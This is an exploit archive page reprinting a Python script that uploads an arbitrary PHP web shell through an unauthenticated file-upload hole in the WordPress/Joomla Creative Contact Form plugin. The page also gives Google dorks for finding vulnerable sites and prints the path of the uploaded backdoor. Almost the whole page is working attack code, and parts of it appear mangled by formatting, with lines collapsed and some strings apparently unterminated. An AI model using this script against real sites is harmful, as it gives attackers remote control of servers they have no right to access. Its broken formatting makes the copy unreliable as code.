首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress / Joomla Creative Contact Form 0.9.7 Shell Upload
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-10-24  
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#               Wordpress plugin version: <= 0.9.7
#               Joomla extension version: <= 2.0.0
# 
# Vulnerability discovered by Gianni Angelozzi
#
# Exploit written by Claudio Viviani
#
# Dork google wordpress:  inurl:inurl:sexy-contact-form
# Dork google joomla   :  inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

# Create multipart header
def create_body_sh3ll_upl04d(payloadname):

   getfields = dict()

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_
CRLF = '\r\n' L = [] for (key, value) in getfields.items(): L.append('--' + LIMIT) L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) L.append('--' + LIMIT) L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname)) L.append('Content-Type: %s' % get_content_type(payloadname)) L.append('') L.append(payloadcontent) L.append('--' + LIMIT + '--') L.append('') body = CRLF.join(L) return body banner = """ ___ ___ __ __,-,__ | Y .-----.----.--| .-----.----.-----.-----. | ' '__| |. | | _ | _| _ | _ | _| -__|__ --| | __| |. / \ |_____|__| |_____| __|__| |_____|_____| |_______| |: | _______ |__| __ |_| |::.|:. | | _ .-----.-----.--------| .---.-. `--- ---' |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::.. . | `-------' _______ __ __ _______ __ __ | _ .----.-----.---.-| |_|__.--.--.-----. | _ .-----.-----| |_.---.-.----| |_ |. 1___| _| -__| _ | _| | | | -__| |. 1___| _ | | _| _ | __| _| |. |___|__| |_____|___._|____|__|\___/|_____| |. |___|_____|__|__|____|___._|____|____| |: 1 | _______ |: 1 | |::.. . | | _ .-----.----.--------. |::.. . | `-------' |. 1___| _ | _| | `-------' |. __) |_____|__| |__|__|__| |: | |::.| `---' Cr3ative C0nt4ct Form Sh3ll Upl04d Discovered by: Gianni Angelozzi Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('-c', '--cms', action="store", help="Insert CMS Type: wordpress|joomla", ) commandList.add_option('-f', '--file', action="store", help="Insert file name, ex: shell.php", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target or not options.file or not options.cms: print(banner) commandList.print_help() sys.exit(1) payloadname = checkfile(options.file) host = checkurl(options.target) timeout = options.timeout cmstype = options.cms print(banner) if options.cms == "wordpress": url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php' backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/' elif options.cms == "joomla": url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php' backdoor_location = host+'/components/com_creativecontactform/fileupload/files/' else: print("[X] -c options require: 'wordpress' or 'joomla'") sys.exit(1) content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_ bodyupload = create_body_sh3ll_upl04d(payloadname) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'content-type': content_type, 'content-length': str(len(bodyupload)) } try: req = urllib2.Request(url_sexy_upload, bodyupload, headers) response = urllib2.urlopen(req) if "error" in response.read(): print("[X] Upload Failed :(") else: print("[!] Shell Uploaded") print("[!] "+backdoor_location+options.file) except urllib2.HTTPError as e: print("[X] Http Error: "+str(e.code)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e.code))
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free WMA MP3 Converter 1.8 Buf
·OpenBSD 5.5 Local Kernel Panic
·Free WMA MP3 Converter 1.8 SEH
·Centreon SQL / Command Injecti
·Feng Office 1.7.4 - Arbitrary
·Windows OLE - Remote Code Exec
·DotNetNuke DNNspot Store 3.0.0
·Creative Contact Form (Wordpre
·Incredible PBX 11 2.0.6.5.0 Re
·HP Operations Agent Remote XSS
·HP Data Protector EXEC_INTEGUT
·Incredible PBX 2.0.6.5.0 - Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved